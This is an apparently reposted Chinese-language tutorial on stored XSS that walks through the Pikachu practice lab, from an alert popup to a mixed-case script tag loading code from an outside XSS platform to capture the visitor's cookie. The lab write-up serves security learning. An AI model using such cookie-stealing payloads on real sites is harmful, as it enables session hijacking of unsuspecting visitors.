存儲型xss


cookie為了安全存在同源策略(瀏覽器的同源策略,限制了不同源的Js,對當前頁面的資源和屬性的權限。保護了a.com域名下的資源不被來自其他頁面腳本被讀取或篡改)

 

攻擊者事先將惡意代碼上傳或儲存到漏洞服務器中,只要受害者瀏覽包含此惡意代碼的頁面就會執行惡意代碼。這就意味着只要訪問了這個頁面的訪客,都有可能會執行這段惡意腳本,因此儲存型XSS的危害會更大。因為存儲型XSS的代碼存在於網頁的代碼中,可以說是永久型的。

存儲型 XSS 一般出現在網站留言、評論、博客日志等交互處,惡意腳本存儲到客戶端或者服務端的數據庫中。

打開pikachu平台的存儲型xss  輸入東西發現發會存在頁面上,也就是會永久保存這樣我們就可以使用存儲型xss

                

 

這時候我們看到,他並沒有做任何處理。

    

 

 這時候輸入<script>alert(111)</script>.有彈窗。

 

這個時候我們輸入<sCRiPt/SrC=//xs.sb/QX9N> 語句。這個是連接到外部xss平台的。我們就可以在平台上看到我們自己訪問的cookie值。用burp攔截發現cookie一致。

  

 

 

                   

 

 

最后我把這條payload刪除掉了,因為他是永久存儲在數據庫中。防止以后使用時會發生不便情況

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM